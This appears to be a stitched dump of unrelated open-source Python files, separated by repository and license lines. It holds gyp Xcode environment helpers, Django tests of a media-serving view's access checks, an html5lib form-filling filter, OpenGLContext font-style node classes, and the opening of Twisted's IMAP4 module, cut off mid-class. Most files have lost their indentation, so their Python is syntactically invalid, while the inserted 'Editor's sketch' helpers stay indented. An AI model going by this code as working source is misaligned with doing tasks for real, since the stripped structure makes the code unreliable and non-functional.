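# destination and .xib resources are renamed to their compiled .nib form.
# All names below are invented for illustration.
def _ExampleGetMacBundleResources():
  class _StubSettings(object):
    def GetBundleResourceFolder(self):
      return 'App.app/Contents/Resources'
  pairs = list(GetMacBundleResources('out', _StubSettings(),
                                     ['en.lproj/Main.xib']))
  assert pairs == [('out/App.app/Contents/Resources/en.lproj/Main.nib',
                    'en.lproj/Main.xib')]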
def GetMacInfoPlist(product_dir, xcode_settings, gyp_path_to_build_path):
"""Returns (info_plist, dest_plist, defines, extra_env), where:
* |info_plist| is the source plist path, relative to the
build directory,
* |dest_plist| is the destination plist path, relative to the
build directory,
* |defines| is a list of preprocessor defines (empty if the plist
shouldn't be preprocessed),
* |extra_env| is a dict of env variables that should be exported when
invoking |mac_tool copy-info-plist|.
Only call this for mac bundle targets.
Args:
product_dir: Path to the directory containing the output bundle,
relative to the build directory.
xcode_settings: The XcodeSettings of the current target.
gyp_path_to_build_path: A function that converts paths relative to the
current gyp file to paths relative to the build directory.
"""
info_plist = xcode_settings.GetPerTargetSetting('INFOPLIST_FILE')
if not info_plist:
return None, None, [], {}
# The make generator doesn't support it, so forbid it everywhere
# to keep the generators more interchangeable.
assert ' ' not in info_plist, (
"Spaces in Info.plist filenames not supported (%s)" % info_plist)
info_plist = gyp_path_to_build_path(info_plist)
# If explicitly set to preprocess the plist, invoke the C preprocessor and
# specify any defines as -D flags.
if xcode_settings.GetPerTargetSetting(
'INFOPLIST_PREPROCESS', default='NO') == 'YES':
# Create an intermediate file based on the path.
defines = shlex.split(xcode_settings.GetPerTargetSetting(
'INFOPLIST_PREPROCESSOR_DEFINITIONS', default=''))
else:
defines = []
dest_plist = os.path.join(product_dir, xcode_settings.GetBundlePlistPath())
extra_env = xcode_settings.GetPerTargetSettings()
return info_plist, dest_plist, defines, extra_env
def _GetXcodeEnv(xcode_settings, built_products_dir, srcroot, configuration,
additional_settings=None):
"""Return the environment variables that Xcode would set. See
http://developer.apple.com/library/mac/#documentation/DeveloperTools/Reference/XcodeBuildSettingRef/1-Build_Setting_Reference/build_setting_ref.html#//apple_ref/doc/uid/TP40003931-CH3-SW153
for a full list.
Args:
xcode_settings: An XcodeSettings object. If this is None, this function
returns an empty dict.
built_products_dir: Absolute path to the built products dir.
srcroot: Absolute path to the source root.
configuration: The build configuration name.
additional_settings: An optional dict with more values to add to the
result.
"""
if not xcode_settings: return {}
# This function is considered a friend of XcodeSettings, so let it reach into
# its implementation details.
spec = xcode_settings.spec
# These are filled in on an as-needed basis.
env = {
'BUILT_PRODUCTS_DIR' : built_products_dir,
'CONFIGURATION' : configuration,
'PRODUCT_NAME' : xcode_settings.GetProductName(),
# See /Developer/Platforms/MacOSX.platform/Developer/Library/Xcode/Specifications/MacOSX\ Product\ Types.xcspec for FULL_PRODUCT_NAME
'SRCROOT' : srcroot,
'SOURCE_ROOT': '${SRCROOT}',
# This is not true for static libraries, but currently the env is only
# written for bundles:
'TARGET_BUILD_DIR' : built_products_dir,
'TEMP_DIR' : '${TMPDIR}',
}
if xcode_settings.GetPerConfigSetting('SDKROOT', configuration):
env['SDKROOT'] = xcode_settings._SdkPath(configuration)
else:
env['SDKROOT'] = ''
if spec['type'] in (
'executable', 'static_library', 'shared_library', 'loadable_module'):
env['EXECUTABLE_NAME'] = xcode_settings.GetExecutableName()
env['EXECUTABLE_PATH'] = xcode_settings.GetExecutablePath()
env['FULL_PRODUCT_NAME'] = xcode_settings.GetFullProductName()
mach_o_type = xcode_settings.GetMachOType()
if mach_o_type:
env['MACH_O_TYPE'] = mach_o_type
env['PRODUCT_TYPE'] = xcode_settings.GetProductType()
if xcode_settings._IsBundle():
env['CONTENTS_FOLDER_PATH'] = \
xcode_settings.GetBundleContentsFolderPath()
env['UNLOCALIZED_RESOURCES_FOLDER_PATH'] = \
xcode_settings.GetBundleResourceFolder()
env['INFOPLIST_PATH'] = xcode_settings.GetBundlePlistPath()
env['WRAPPER_NAME'] = xcode_settings.GetWrapperName()
install_name = xcode_settings.GetInstallName()
if install_name:
env['LD_DYLIB_INSTALL_NAME'] = install_name
install_name_base = xcode_settings.GetInstallNameBase()
if install_name_base:
env['DYLIB_INSTALL_NAME_BASE'] = install_name_base
if not additional_settings:
additional_settings = {}
else:
# Flatten lists to strings.
for k in additional_settings:
if not isinstance(additional_settings[k], str):
additional_settings[k] = ' '.join(additional_settings[k])
additional_settings.update(env)
for k in additional_settings:
additional_settings[k] = _NormalizeEnvVarReferences(additional_settings[k])
return additional_settings
def _NormalizeEnvVarReferences(str):
"""Takes a string containing variable references in the form ${FOO}, $(FOO),
or $FOO, and returns a string with all variable references in the form ${FOO}.
"""
# $FOO -> ${FOO}
str = re.sub(r'\$([a-zA-Z_][a-zA-Z0-9_]*)', r'${\1}', str)
# $(FOO) -> ${FOO}
matches = re.findall(r'(\$\(([a-zA-Z0-9\-_]+)\))', str)
for match in matches:
to_replace, variable = match
assert '$(' not in match, '$($(FOO)) variables not supported: ' + match
str = str.replace(to_replace, '${' + variable + '}')
return str
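# Editor's sketch (not part of gyp): all three reference styles are
# normalized to the ${FOO} form.
def _ExampleNormalizeEnvVarReferences():
  assert _NormalizeEnvVarReferences('$FOO') == '${FOO}'
  assert _NormalizeEnvVarReferences('$(FOO)/bar') == '${FOO}/bar'
  assert _NormalizeEnvVarReferences('${FOO}') == '${FOO}'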
def ExpandEnvVars(string, expansions):
"""Expands ${VARIABLES}, $(VARIABLES), and $VARIABLES in string per the
expansions list. If the variable expands to something that references
another variable, this variable is expanded as well if it's in env --
until no variables present in env are left."""
for k, v in reversed(expansions):
string = string.replace('${' + k + '}', v)
string = string.replace('$(' + k + ')', v)
string = string.replace('$' + k, v)
return string
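# Editor's sketch (not part of gyp): expansions are applied last-to-first,
# so later entries may refer to earlier ones -- exactly the order that
# GetSortedXcodeEnv produces. The names are invented for illustration.
def _ExampleExpandEnvVars():
  expansions = [('PRODUCT_NAME', 'App'),
                ('WRAPPER_NAME', '${PRODUCT_NAME}.app')]
  assert ExpandEnvVars('${WRAPPER_NAME}/Contents',
                       expansions) == 'App.app/Contents'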
def _TopologicallySortedEnvVarKeys(env):
"""Takes a dict |env| whose values are strings that can refer to other keys,
for example env['foo'] = '$(bar) and $(baz)'. Returns a list L of all keys of
env such that key2 is after key1 in L if env[key2] refers to env[key1].
Throws an Exception in case of dependency cycles.
"""
# Since environment variables can refer to other variables, the evaluation
# order is important. Below is the logic to compute the dependency graph
# and sort it.
regex = re.compile(r'\$\{([a-zA-Z0-9\-_]+)\}')
def GetEdges(node):
# Use a definition of edges such that user_of_variable -> used_variable.
# This happens to be easier in this case, since a variable's
# definition contains all variables it references in a single string.
# We can then reverse the result of the topological sort at the end.
# Since: reverse(topsort(DAG)) = topsort(reverse_edges(DAG))
matches = set([v for v in regex.findall(env[node]) if v in env])
for dependee in matches:
assert '${' not in dependee, 'Nested variables not supported: ' + dependee
return matches
try:
# Topologically sort, and then reverse, because we used an edge definition
# that's inverted from the expected result of this function (see comment
# above).
order = gyp.common.TopologicallySorted(env.keys(), GetEdges)
order.reverse()
return order
except gyp.common.CycleError, e:
raise GypError(
'Xcode environment variables are cyclically dependent: ' + str(e.nodes))
def GetSortedXcodeEnv(xcode_settings, built_products_dir, srcroot,
configuration, additional_settings=None):
env = _GetXcodeEnv(xcode_settings, built_products_dir, srcroot, configuration,
additional_settings)
return [(key, env[key]) for key in _TopologicallySortedEnvVarKeys(env)]
def GetSpecPostbuildCommands(spec, quiet=False):
"""Returns the list of postbuilds explicitly defined on |spec|, in a form
executable by a shell."""
postbuilds = []
for postbuild in spec.get('postbuilds', []):
if not quiet:
postbuilds.append('echo POSTBUILD\\(%s\\) %s' % (
spec['target_name'], postbuild['postbuild_name']))
postbuilds.append(gyp.common.EncodePOSIXShellList(postbuild['action']))
return postbuilds
def _HasIOSTarget(targets):
"""Returns true if any target contains the iOS specific key
IPHONEOS_DEPLOYMENT_TARGET."""
for target_dict in targets.values():
for config in target_dict['configurations'].values():
if config.get('xcode_settings', {}).get('IPHONEOS_DEPLOYMENT_TARGET'):
return True
return False
def _AddIOSDeviceConfigurations(targets):
"""Clone all targets and append -iphoneos to the name. Configure these targets
to build for iOS devices."""
for target_dict in targets.values():
for config_name in target_dict['configurations'].keys():
config = target_dict['configurations'][config_name]
new_config_name = config_name + '-iphoneos'
new_config_dict = copy.deepcopy(config)
if target_dict['toolset'] == 'target':
new_config_dict['xcode_settings']['ARCHS'] = ['armv7']
new_config_dict['xcode_settings']['SDKROOT'] = 'iphoneos'
target_dict['configurations'][new_config_name] = new_config_dict
return targets
def CloneConfigurationForDeviceAndEmulator(target_dicts):
"""If |target_dicts| contains any iOS targets, automatically create -iphoneos
targets for iOS device builds."""
if _HasIOSTarget(target_dicts):
return _AddIOSDeviceConfigurations(target_dicts)
return target_dicts
| mit |
FIWARE-TMForum/business-ecosystem-charging-backend | src/wstore/tests.py | 1 | 10861 | # -*- coding: utf-8 -*-
# Copyright (c) 2013 - 2017 CoNWeT Lab., Universidad Politécnica de Madrid
# This file belongs to the business-charging-backend
# of the Business API Ecosystem.
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import json
from mock import call
from wstore.store_commons.tests import *
from wstore.admin.users.tests import *
from django.test.client import RequestFactory
from wstore import views
class ServeMediaTestCase(TestCase):
tags = ('media', )
_resource_path = 'media/assets/test_user/widget.wgt'
_expected_file = 'assets/test_user/widget.wgt'
def setUp(self):
# Mock user
self._user = MagicMock()
self._user.is_anonymous.return_value = False
self._org = MagicMock()
self._user.userprofile.current_organization = self._org
views.Organization = MagicMock()
views.Organization.objects.get.return_value = self._org
# Mock Resource model
views.Resource = MagicMock()
self._asset_inst = MagicMock()
self._asset_inst.is_public = False
self._asset_inst.provider = self._org
views.Resource.objects.filter.return_value = [self._asset_inst]
# Mock serve and smart_str
views.serve = MagicMock()
views.smart_str = MagicMock()
views.smart_str.return_value = 'smart string'
# Mock is_file
views.os.path.isfile = MagicMock()
# Mock Order
views.Order = MagicMock()
order_inst = MagicMock()
order_inst.owner_organization = self._org
views.Order.objects.get.return_value = order_inst
# Mock offering
views.Offering = MagicMock()
self._offering_inst = MagicMock()
self._offering_inst.asset = self._asset_inst
views.Offering.objects.get.side_effect = [MagicMock(), self._offering_inst]
def _validate_res_call(self):
views.Resource.objects.filter.assert_called_once_with(resource_path=self._resource_path)
self.assertEquals(0, views.Order.objects.get.call_count)
def _validate_off_call(self):
self._validate_res_call()
self.assertEquals([
call(pk='offpk1'),
call(pk='offpk2')
], views.Offering.objects.get.call_args_list)
def _validate_bundle_call(self):
self._validate_res_call()
self.assertEquals([
call(pk='offpk1'),
call(pk='offpk2'),
call(pk='offpk3'),
call(pk='offpk3'),
call(pk='offpk4'),
call(pk='offpk4')
], views.Offering.objects.get.call_args_list)
def _validate_product_bundle_call(self):
views.Resource.objects.filter.assert_called_once_with(resource_path=self._resource_path)
self.assertEquals([
call(pk='prodpk1'),
call(pk='prodpk2')
], views.Resource.objects.get.call_args_list)
self.assertEquals(0, views.Order.objects.get.call_count)
self.assertEquals([
call(pk='offpk1'),
call(pk='offpk2')
], views.Offering.objects.get.call_args_list)
def _validate_upgrading_call(self):
self.assertEquals([
call(resource_path=self._resource_path),
call(state='upgrading', provider=self._org)
], views.Resource.objects.filter.call_args_list)
views.Organization.objects.get.assert_called_once_with(name='test_user')
def _validate_order_call(self):
views.Order.objects.get.assert_called_once_with(pk='111111111111111111111111')
self.assertEquals(0, views.Resource.objects.get.call_count)
def _validate_empty_call(self):
self.assertEquals(0, views.Resource.objects.get.call_count)
self.assertEquals(0, views.Order.objects.get.call_count)
def _validate_error(self, response, expected):
resp = json.loads(response.content)
self.assertEquals(expected[0], response.status_code)
self.assertEquals(expected[1], resp)
def _validate_serve(self, response, expected):
views.os.path.isfile(expected)
views.serve.assert_called_once_with(self.request, expected, document_root='/home/test/media/')
def _validate_xfile(self, response, expected):
views.os.path.isfile(expected)
views.smart_str.assert_called_once_with(expected)
self.assertEquals('smart string', response['X-Sendfile'])
def _public_asset(self):
self._asset_inst.is_public = True
self._asset_inst.provider = MagicMock()
def _usexfiles(self):
views.settings = MagicMock()
views.settings.USE_XSENDFILE = True
views.settings.MEDIA_ROOT = '/home/test/media/'
views.settings.MEDIA_URL = '/media/'
views.settings.MEDIA_DIR = 'media/'
def _asset_error(self):
views.Resource.objects.filter.return_value = []
def _order_error(self):
views.Order.objects.get.side_effect = Exception('Not found')
def _unauthorized(self):
self._acquired()
views.Offering.objects.get.side_effect = [MagicMock(is_digital=False),
MagicMock(is_digital=True, asset=MagicMock())]
def _not_loged(self):
self._user.is_anonymous.return_value = True
def _not_found(self):
views.os.path.isfile.return_value = False
def _acquired(self):
self._user.userprofile.current_organization = MagicMock()
self._user.userprofile.current_organization.acquired_offerings = ['offpk1', 'offpk2']
def _bundle_acquired(self):
self._acquired()
self._offering_inst = MagicMock(asset=None, bundled_offerings=['offpk3', 'offpk4'])
views.Offering.objects.get.side_effect = [MagicMock(), self._offering_inst,
MagicMock(is_digital=True, asset=MagicMock()),
MagicMock(is_digital=True, asset=MagicMock()),
MagicMock(is_digital=True, asset=self._asset_inst),
MagicMock(is_digital=True, asset=self._asset_inst)]
def _product_bundle_acquired(self):
self._acquired()
self._offering_inst.asset = MagicMock(bundled_assets=['prodpk1', 'prodpk2'])
views.Resource.objects.get.side_effect = [self._asset_inst, MagicMock(), self._asset_inst]
def _upgrading(self):
self._asset_inst.old_versions = [MagicMock(resource_path=self._resource_path)]
views.Resource.objects.filter.side_effect = [[], [MagicMock(old_versions=[]), self._asset_inst]]
@parameterized.expand([
('asset', 'assets/test_user', 'widget.wgt', _validate_res_call, _validate_serve, _expected_file),
('asset_acquired', 'assets/test_user', 'widget.wgt', _validate_off_call, _validate_serve, _expected_file, _acquired),
('asset_in_bundle', 'assets/test_user', 'widget.wgt', _validate_bundle_call, _validate_serve, _expected_file, _bundle_acquired),
('asset_in_product_bundle', 'assets/test_user', 'widget.wgt', _validate_product_bundle_call, _validate_serve, _expected_file, _product_bundle_acquired),
('public_asset', 'assets/test_user', 'widget.wgt', _validate_res_call, _validate_serve, _expected_file, _public_asset),
('upgrading_asset', 'assets/test_user', 'widget.wgt', _validate_upgrading_call, _validate_serve, _expected_file, _upgrading),
('invoice', 'bills', '111111111111111111111111_userbill.pdf', _validate_order_call, _validate_xfile, 'bills/111111111111111111111111_userbill.pdf', _usexfiles),
('asset_not_found', 'assets/test_user', 'widget.wgt', _validate_upgrading_call, _validate_error, (404, {
'result': 'error',
'error': 'The specified asset does not exists'
}), _asset_error),
('asset_anonymous', 'assets/test_user', 'widget.wgt', _validate_res_call, _validate_error, (401, {
'result': 'error',
'error': 'You must be authenticated to download the specified asset'
}), _not_loged),
('asset_unauthorized', 'assets/test_user', 'widget.wgt', _validate_res_call, _validate_error, (403, {
'result': 'error',
'error': 'You are not authorized to download the specified asset'
}), _unauthorized),
('invoice_not_found', 'bills', '111111111111111111111111_userbill.pdf', _validate_order_call, _validate_error, (404, {
'result': 'error',
'error': 'The specified invoice does not exists'
}), _order_error),
('invoice_anonymous', 'bills', '111111111111111111111111_userbill.pdf', _validate_empty_call, _validate_error, (401, {
'result': 'error',
'error': 'You must provide credentials for downloading invoices'
}), _not_loged),
('invoice_unauthorized', 'bills', '111111111111111111111111_userbill.pdf', _validate_order_call, _validate_error, (403, {
'result': 'error',
'error': 'You are not authorized to download the specified invoice'
}), _unauthorized),
('file_not_found', 'assets/test_user', 'widget.wgt', _validate_res_call, _validate_error, (404, {
'result': 'error',
'error': 'Resource not found'
}), _not_found),
('invalid_type', 'invalid/user', 'widget.wgt', _validate_empty_call, _validate_error, (404, {
'result': 'error',
'error': 'Resource not found'
}))
])
@override_settings(MEDIA_ROOT='/home/test/media/', MEDIA_URL='/media/', MEDIA_DIR='media/')
def test_serve_media(self, name, path, file_name, call_validator, res_validator, expected, side_effect=None):
if side_effect is not None:
side_effect(self)
factory = RequestFactory()
self.request = factory.post(
'media/' + path + '/' + file_name,
HTTP_ACCEPT='application/json'
)
self.request.user = self._user
media_view = views.ServeMedia(permitted_methods=('GET',))
response = media_view.read(self.request, path, file_name)
call_validator(self)
res_validator(self, response, expected)
| agpl-3.0 |
twamarc/schemaorg | lib/html5lib/filters/formfiller.py | 135 | 5839 | #
# The goal is to finally have a form filler where you pass data for
# each form, using the algorithm for "Seeding a form with initial values"
# See http://www.whatwg.org/specs/web-forms/current-work/#seeding
#
import _base
from html5lib.constants import spaceCharacters
spaceCharacters = u"".join(spaceCharacters)
class SimpleFilter(_base.Filter):
def __init__(self, source, fieldStorage):
_base.Filter.__init__(self, source)
self.fieldStorage = fieldStorage
def __iter__(self):
field_indices = {}
state = None
field_name = None
for token in _base.Filter.__iter__(self):
type = token["type"]
if type in ("StartTag", "EmptyTag"):
name = token["name"].lower()
if name == "input":
field_name = None
field_type = None
input_value_index = -1
input_checked_index = -1
for i,(n,v) in enumerate(token["data"]):
n = n.lower()
if n == u"name":
field_name = v.strip(spaceCharacters)
elif n == u"type":
field_type = v.strip(spaceCharacters)
elif n == u"checked":
input_checked_index = i
elif n == u"value":
input_value_index = i
value_list = self.fieldStorage.getlist(field_name)
field_index = field_indices.setdefault(field_name, 0)
if field_index < len(value_list):
value = value_list[field_index]
else:
value = ""
if field_type in (u"checkbox", u"radio"):
if value_list:
if token["data"][input_value_index][1] == value:
if input_checked_index < 0:
token["data"].append((u"checked", u""))
field_indices[field_name] = field_index + 1
elif input_checked_index >= 0:
del token["data"][input_checked_index]
elif field_type not in (u"button", u"submit", u"reset"):
if input_value_index >= 0:
token["data"][input_value_index] = (u"value", value)
else:
token["data"].append((u"value", value))
field_indices[field_name] = field_index + 1
field_type = None
field_name = None
elif name == "textarea":
field_type = "textarea"
field_name = dict((token["data"])[::-1])["name"]
elif name == "select":
field_type = "select"
attributes = dict(token["data"][::-1])
field_name = attributes.get("name")
is_select_multiple = "multiple" in attributes
is_selected_option_found = False
elif field_type == "select" and field_name and name == "option":
option_selected_index = -1
option_value = None
for i,(n,v) in enumerate(token["data"]):
n = n.lower()
if n == "selected":
option_selected_index = i
elif n == "value":
option_value = v.strip(spaceCharacters)
if option_value is None:
raise NotImplementedError("<option>s without a value= attribute")
else:
value_list = self.fieldStorage.getlist(field_name)
if value_list:
field_index = field_indices.setdefault(field_name, 0)
if field_index < len(value_list):
value = value_list[field_index]
else:
value = ""
if (is_select_multiple or not is_selected_option_found) and option_value == value:
if option_selected_index < 0:
token["data"].append((u"selected", u""))
field_indices[field_name] = field_index + 1
is_selected_option_found = True
elif option_selected_index >= 0:
del token["data"][option_selected_index]
elif field_type is not None and field_name and type == "EndTag":
name = token["name"].lower()
if name == field_type:
if name == "textarea":
value_list = self.fieldStorage.getlist(field_name)
if value_list:
field_index = field_indices.setdefault(field_name, 0)
if field_index < len(value_list):
value = value_list[field_index]
else:
value = ""
yield {"type": "Characters", "data": value}
field_indices[field_name] = field_index + 1
field_name = None
elif name == "option" and field_type == "select":
pass # TODO: part of "option without value= attribute" processing
elif field_type == "textarea":
continue # ignore token
yield token
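# Editor's sketch (not part of html5lib): a plain object with getlist() can
# stand in for cgi.FieldStorage when driving the filter; the token stream
# and field names below are invented for illustration.
def _example_fill():
    class _Fields(object):
        def getlist(self, name):
            return {u"q": [u"hello"]}.get(name, [])
    tokens = [{"type": "EmptyTag", "name": "input",
               "data": [(u"name", u"q"), (u"type", u"text")]}]
    out = list(SimpleFilter(tokens, _Fields()))
    # The input token now carries (u"value", u"hello") in its data list.
    assert (u"value", u"hello") in out[0]["data"]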
| apache-2.0 |
stack-of-tasks/rbdlpy | tutorial/lib/python2.7/site-packages/OpenGLContext/scenegraph/text/fontstyle3d.py | 2 | 2726 | """FontStyle extensions for OpenGLContext"""
from vrml.vrml97 import basenodes
from vrml import field, node
class FontStyle( basenodes.FontStyle ):
"""FontStyle with ability to specify geometry format"""
PROTO = 'FontStyle'
## #Fields
## style = field.newField( 'style', 'SFString', 0, 'PLAIN')
## topToBottom = field.newField( 'topToBottom', 'SFBool', 0, 1)
## family = field.newField( 'family', 'MFString', 0, 'SERIF')
## language = field.newField( 'language', 'SFString', 0, '')
## horizontal = field.newField( 'horizontal', 'SFBool', 0, 1)
## justify = field.newField( 'justify', 'MFString', 0, ['BEGIN'])
## spacing = field.newField( 'spacing', 'SFFloat', 0, 1.0)
## leftToRight = field.newField( 'leftToRight', 'SFBool', 0, 1)
## size = field.newField( 'size', 'SFFloat', 0, 1.0)
format = field.newField( 'format', 'SFString', 1, "solid")
class FontStyle3D( FontStyle ):
"""FontStyle with ability to specify 3D extrusion properties"""
PROTO = 'FontStyle3D'
quality = field.newField( 'quality', 'SFInt32', 1, 3)
renderFront = field.newField( 'renderFront', 'SFBool', 1, 1)
renderSides = field.newField( 'renderSides', 'SFBool', 1, 0)
renderBack = field.newField( 'renderBack', 'SFBool', 1, 0)
thickness = field.newField( 'thickness', 'SFFloat', 1, 0.0)
class Glyph( node.Node ):
"""Storage for a glyph's data"""
PROTO = "Glyph"
class Glyph3D( Glyph ):
"""Storage for a 3D glyph's data"""
PROTO = "Glyph3D"
character = field.newField( 'character', 'SFString', 1, "")
width = field.newField( 'width', 'SFFloat', 1, 0.0)
height = field.newField( 'height', 'SFFloat', 1, 0.0)
contours = field.newField( 'contours', 'MFVec2f', 1, list)
outlines = field.newField( 'outlines', 'MFVec2f', 1, list)
class SolidGlyph3D( Glyph3D ):
"""Storage for a solid 3D glyph's data"""
extrusionData = field.newField( 'extrusionData', 'MFNode', 1, list)
tessellationData = field.newField( 'tessellationData', 'MFNode', 1, list)
class SG3D_ExtrData( node.Node ):
"""Storage for contour's extrusion-data for a SolidGlyph3D"""
PROTO = "SG3D_ExtrData"
points = field.newField( 'points', 'MFVec2f', 1, list)
normals = field.newField( 'normals', 'MFVec2f', 1, list)
class SG3D_TessData( node.Node ):
"""Storage for face-tessellation-data for a SolidGlyph3D"""
PROTO = "SG3D_TessData"
geometryType = field.newField( 'geometryType', 'SFString', 1, "GL_TRIANGLES")
vertices = field.newField( 'vertices', 'MFVec2f', 1, list)
class Font( node.Node ):
"""Storage for a precompiled Font"""
PROTO = "Font"
glyphs = field.newField( 'glyphs', 'MFNode', 1, list)
style = field.newField( 'style', 'SFNode', 1, None)
| lgpl-3.0 |
Immortalin/python-for-android | python-modules/twisted/twisted/mail/imap4.py | 49 | 200466 | # -*- test-case-name: twisted.mail.test.test_imap -*-
# Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
An IMAP4 protocol implementation
@author: Jp Calderone
To do::
Suspend idle timeout while server is processing
Use an async message parser instead of buffering in memory
Figure out a way to not queue multi-message client requests (Flow? A simple callback?)
Clarify some API docs (Query, etc)
Make APPEND recognize (again) non-existent mailboxes before accepting the literal
"""
import rfc822
import base64
import binascii
import hmac
import re
import copy
import tempfile
import string
import time
import random
import types
import email.Utils
try:
import cStringIO as StringIO
except:
import StringIO
from zope.interface import implements, Interface
from twisted.protocols import basic
from twisted.protocols import policies
from twisted.internet import defer
from twisted.internet import error
from twisted.internet.defer import maybeDeferred
from twisted.python import log, text
from twisted.internet import interfaces
from twisted import cred
import twisted.cred.error
import twisted.cred.credentials
class MessageSet(object):
"""
Essentially an infinite bitfield, with some extra features.
@type getnext: Function taking C{int} returning C{int}
@ivar getnext: A function that returns the next message number,
used when iterating through the MessageSet. By default, a function
returning the next integer is supplied, but as this can be rather
inefficient for sparse UID iterations, it is recommended to supply
one when messages are requested by UID. The argument is provided
as a hint to the implementation and may be ignored if it makes sense
to do so (eg, if an iterator is being used that maintains its own
state, it is guaranteed that it will not be called out-of-order).
"""
_empty = []
def __init__(self, start=_empty, end=_empty):
"""
Create a new MessageSet()
@type start: Optional C{int}
@param start: Start of range, or only message number
@type end: Optional C{int}
@param end: End of range.
"""
self._last = self._empty # Last message/UID in use
self.ranges = [] # List of ranges included
self.getnext = lambda x: x+1 # A function which will return the next
# message id. Handy for UID requests.
if start is self._empty:
return
if isinstance(start, types.ListType):
self.ranges = start[:]
self.clean()
else:
self.add(start,end)
# Ooo. A property.
def last():
def _setLast(self, value):
if self._last is not self._empty:
raise ValueError("last already set")
self._last = value
for i, (l, h) in enumerate(self.ranges):
if l is not None:
break # There are no more Nones after this
l = value
if h is None:
h = value
if l > h:
l, h = h, l
self.ranges[i] = (l, h)
self.clean()
def _getLast(self):
return self._last
doc = '''
"Highest" message number, refered to by "*".
Must be set before attempting to use the MessageSet.
'''
return _getLast, _setLast, None, doc
last = property(*last())
def add(self, start, end=_empty):
"""
Add another range
@type start: C{int}
@param start: Start of range, or only message number
@type end: Optional C{int}
@param end: End of range.
"""
if end is self._empty:
end = start
if self._last is not self._empty:
if start is None:
start = self.last
if end is None:
end = self.last
if start > end:
# Try to keep in low, high order if possible
# (But we don't know what None means, this will keep
# None at the start of the ranges list)
start, end = end, start
self.ranges.append((start, end))
self.clean()
def __add__(self, other):
if isinstance(other, MessageSet):
ranges = self.ranges + other.ranges
return MessageSet(ranges)
else:
res = MessageSet(self.ranges)
try:
res.add(*other)
except TypeError:
res.add(other)
return res
def extend(self, other):
if isinstance(other, MessageSet):
self.ranges.extend(other.ranges)
self.clean()
else:
try:
self.add(*other)
except TypeError:
self.add(other)
return self
def clean(self):
"""
Clean ranges list, combining adjacent ranges
"""
self.ranges.sort()
oldl, oldh = None, None
for i,(l, h) in enumerate(self.ranges):
if l is None:
continue
# l is >= oldl and h is >= oldh due to sort()
if oldl is not None and l <= oldh + 1:
l = oldl
h = max(oldh, h)
self.ranges[i - 1] = None
self.ranges[i] = (l, h)
oldl, oldh = l, h
self.ranges = filter(None, self.ranges)
def __contains__(self, value):
"""
May raise TypeError if we encounter an open-ended range
"""
for l, h in self.ranges:
if l is None:
raise TypeError(
"Can't determine membership; last value not set")
if l <= value <= h:
return True
return False
def _iterator(self):
for l, h in self.ranges:
l = self.getnext(l-1)
while l <= h:
yield l
l = self.getnext(l)
if l is None:
break
def __iter__(self):
if self.ranges and self.ranges[0][0] is None:
raise TypeError("Can't iterate; last value not set")
return self._iterator()
def __len__(self):
res = 0
for l, h in self.ranges:
if l is None:
if h is None:
res += 1
else:
raise TypeError("Can't size object; last value not set")
else:
res += (h - l) + 1
return res
def __str__(self):
p = []
for low, high in self.ranges:
if low == high:
if low is None:
p.append('*')
else:
p.append(str(low))
elif low is None:
p.append('%d:*' % (high,))
else:
p.append('%d:%d' % (low, high))
return ','.join(p)
def __repr__(self):
return '<MessageSet %s>' % (str(self),)
def __eq__(self, other):
if isinstance(other, MessageSet):
return self.ranges == other.ranges
return False
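# Editor's sketch (not part of Twisted): adjacent ranges are coalesced and
# rendered in IMAP sequence-set syntax; the numbers are arbitrary.
def _exampleMessageSet():
    s = MessageSet(1, 5)
    s.add(6, 9)  # adjacent to 1:5, so clean() merges them into 1:9
    s.add(12)
    assert str(s) == '1:9,12'
    assert 7 in s and len(s) == 10
    assert list(s) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 12]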
class LiteralString:
def __init__(self, size, defered):
self.size = size
self.data = []
self.defer = defered
def write(self, data):
self.size -= len(data)
passon = None
if self.size > 0:
self.data.append(data)
else:
if self.size:
data, passon = data[:self.size], data[self.size:]
else:
passon = ''
if data:
self.data.append(data)
return passon
def callback(self, line):
"""
Call the deferred with the data and the rest of the line.
"""
self.defer.callback((''.join(self.data), line))
class LiteralFile:
_memoryFileLimit = 1024 * 1024 * 10
def __init__(self, size, defered):
self.size = size
self.defer = defered
if size > self._memoryFileLimit:
self.data = tempfile.TemporaryFile()
else:
self.data = StringIO.StringIO()
def write(self, data):
self.size -= len(data)
passon = None
if self.size > 0:
self.data.write(data)
else:
if self.size:
data, passon = data[:self.size], data[self.size:]
else:
passon = ''
if data:
self.data.write(data)
return passon
def callback(self, line):
"""
Call the deferred with the data and the rest of the line.
"""
self.data.seek(0,0)
self.defer.callback((self.data, line))
class WriteBuffer:
"""Buffer up a bunch of writes before sending them all to a transport at once.
"""
def __init__(self, transport, size=8192):
self.bufferSize = size
self.transport = transport
self._length = 0
self._writes = []
def write(self, s):
self._length += len(s)
self._writes.append(s)
if self._length > self.bufferSize:
self.flush()
def flush(self):
if self._writes:
self.transport.writeSequence(self._writes)
self._writes = []
self._length = 0
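# Editor's sketch (not part of Twisted): writes accumulate until the buffer
# threshold is crossed, then go out in a single writeSequence() call. The
# tiny fake transport is invented for illustration.
def _exampleWriteBuffer():
    class _FakeTransport(object):
        def __init__(self):
            self.sequences = []
        def writeSequence(self, data):
            self.sequences.append(list(data))
    t = _FakeTransport()
    b = WriteBuffer(t, size=4)
    b.write('ab')
    b.write('cde')  # total length 5 > 4, so both chunks are flushed
    assert t.sequences == [['ab', 'cde']]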
class Command:
_1_RESPONSES = ('CAPABILITY', 'FLAGS', 'LIST', 'LSUB', 'STATUS', 'SEARCH', 'NAMESPACE')
_2_RESPONSES = ('EXISTS', 'EXPUNGE', 'FETCH', 'RECENT')
_OK_RESPONSES = ('UIDVALIDITY', 'UNSEEN', 'READ-WRITE', 'READ-ONLY', 'UIDNEXT', 'PERMANENTFLAGS')
defer = None
def __init__(self, command, args=None, wantResponse=(),
continuation=None, *contArgs, **contKw):
self.command = command
self.args = args
self.wantResponse = wantResponse
self.continuation = lambda x: continuation(x, *contArgs, **contKw)
self.lines = []
